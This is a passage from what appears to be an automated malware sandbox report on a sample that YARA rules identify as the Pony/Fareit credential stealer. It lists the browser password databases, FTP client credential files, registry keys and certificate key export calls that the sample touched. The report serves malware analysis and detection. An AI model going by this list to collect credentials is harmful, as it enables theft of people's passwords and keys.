              Source: pbfe2Xcxue.exe, 00000000.00000002.2904373998.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 0.3.pbfe2Xcxue.exe.a70000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.pbfe2Xcxue.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: pbfe2Xcxue.exe PID: 7428, type: MEMORYSTR

              System Summary

              barindex
              Source: 0.3.pbfe2Xcxue.exe.a70000.0.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
              Source: 0.3.pbfe2Xcxue.exe.a70000.0.unpack, type: UNPACKEDPEMatched rule: Fareit Payload Author: kevoreilly
              Source: 0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
              Source: 0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
              Source: 0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Fareit Payload Author: kevoreilly
              Source: 0.2.pbfe2Xcxue.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
              Source: 0.2.pbfe2Xcxue.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
              Source: 0.2.pbfe2Xcxue.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Fareit Payload Author: kevoreilly
              Source: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
              Source: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
              Source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
              Source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
              Source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Fareit Payload Author: kevoreilly
              Source: Process Memory Space: pbfe2Xcxue.exe PID: 7428, type: MEMORYSTRMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
              Source: Process Memory Space: pbfe2Xcxue.exe PID: 7428, type: MEMORYSTRMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_00402EE2 CreateProcessAsUserA,ShellExecuteA,0_2_00402EE2
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_0041256A0_2_0041256A
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_004039CE0_2_004039CE
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: String function: 00410B9E appears 42 times
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: String function: 00401DAD appears 139 times
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: String function: 004045D1 appears 51 times
              Source: pbfe2Xcxue.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 0.3.pbfe2Xcxue.exe.a70000.0.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
              Source: 0.3.pbfe2Xcxue.exe.a70000.0.unpack, type: UNPACKEDPEMatched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
              Source: 0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
              Source: 0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
              Source: 0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
              Source: 0.2.pbfe2Xcxue.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
              Source: 0.2.pbfe2Xcxue.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
              Source: 0.2.pbfe2Xcxue.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
              Source: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
              Source: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
              Source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
              Source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
              Source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
              Source: Process Memory Space: pbfe2Xcxue.exe PID: 7428, type: MEMORYSTRMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
              Source: Process Memory Space: pbfe2Xcxue.exe PID: 7428, type: MEMORYSTRMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@12/1
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_0040D67C CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmpA,lstrcmpA,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,0_2_0040D67C
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_004029B5 LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,0_2_004029B5
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_00402D3E WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle,0_2_00402D3E
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_0040AB37 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,0_2_0040AB37
              Source: pbfe2Xcxue.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile read: C:\Windows\win.iniJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: pbfe2Xcxue.exe, 00000000.00000002.2904373998.000000000052C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE server_card_cloud_token_data (id VARCHAR, suffix VARCHAR, exp_month INTEGER DEFAULT 0, exp_year INTEGER DEFAULT 0, card_art_url VARCHAR, instrument_token VARCHAR) ;
              Source: pbfe2Xcxue.exe, 00000000.00000003.1720426996.0000000000575000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: pbfe2Xcxue.exeReversingLabs: Detection: 95%
              Source: pbfe2Xcxue.exeVirustotal: Detection: 75%
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile read: C:\Users\user\Desktop\pbfe2Xcxue.exeJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: untfs.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: ulib.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: ifsutil.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: msi.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: pbfe2Xcxue.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: pbfe2Xcxue.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeUnpacked PE file: 0.2.pbfe2Xcxue.exe.400000.0.unpack .text:ER;.data:W;.RData:R;.Adata:R; vs .text:ER;.rdata:R;.data:W;
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeUnpacked PE file: 0.2.pbfe2Xcxue.exe.400000.0.unpack
              Source: Yara matchFile source: 0.3.pbfe2Xcxue.exe.a70000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.pbfe2Xcxue.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: pbfe2Xcxue.exe PID: 7428, type: MEMORYSTR
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_00402514 LoadLibraryA,GetProcAddress,0_2_00402514
              Source: pbfe2Xcxue.exeStatic PE information: section name: .Adata
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_004E0626 push 00000000h; ret 0_2_004E062B
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_004F0616 push 00000000h; ret 0_2_004F061B
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exe TID: 7432Thread sleep time: -70000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_00405478 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,0_2_00405478
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_00404426 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,0_2_00404426
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_00405108 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,0_2_00405108
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_00408DAD FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,0_2_00408DAD
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_00408C29 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,0_2_00408C29
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_00409AF6 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,0_2_00409AF6
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_0040487D GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,0_2_0040487D
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: pbfe2Xcxue.exe, 00000000.00000002.2904373998.000000000052C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeAPI call chain: ExitProcess graph end nodegraph_0-11736
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_00402514 LoadLibraryA,GetProcAddress,0_2_00402514
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_0040FC92 mov eax, dword ptr fs:[00000030h]0_2_0040FC92
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_004E00EB push dword ptr fs:[00000030h]0_2_004E00EB
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_004F00DB push dword ptr fs:[00000030h]0_2_004F00DB
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_00410949 SetUnhandledExceptionFilter,RevertToSelf,0_2_00410949
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_00410686 lstrcmpiA,LogonUserA,lstrlenA,LCMapStringA,LogonUserA,LogonUserA,LoadUserProfileA,ImpersonateLoggedOnUser,RevertToSelf,UnloadUserProfile,CloseHandle,0_2_00410686
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_00404752 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00404752
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,0_2_0040487D
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_0041087F OleInitialize,GetUserNameA,0_2_0041087F
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_0040487D GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,0_2_0040487D

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 0.3.pbfe2Xcxue.exe.a70000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.pbfe2Xcxue.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: pbfe2Xcxue.exe PID: 7428, type: MEMORYSTR
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\wcx_ftp.iniJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\SharedSettings.ccsJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\Frigate3\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\FTP Explorer\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccsJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\SiteDesigner\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.sqliteJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\SharedSettings_1_0_5.ccsJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.sqliteJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbarJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\TurboFTP\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\CuteFTP\sm.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.ccsJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\BlazeFtp\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\RhinoSoft.com\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbarJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings.ccsJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\Estsoft\ALFTP\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: HKEY_CURRENT_USER\Software\TurboFTPJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\CuteFTP\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\FTPInfo\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\AceBITJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\ExpanDrive\drives.jsJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\NetSarang\Jump to behavior
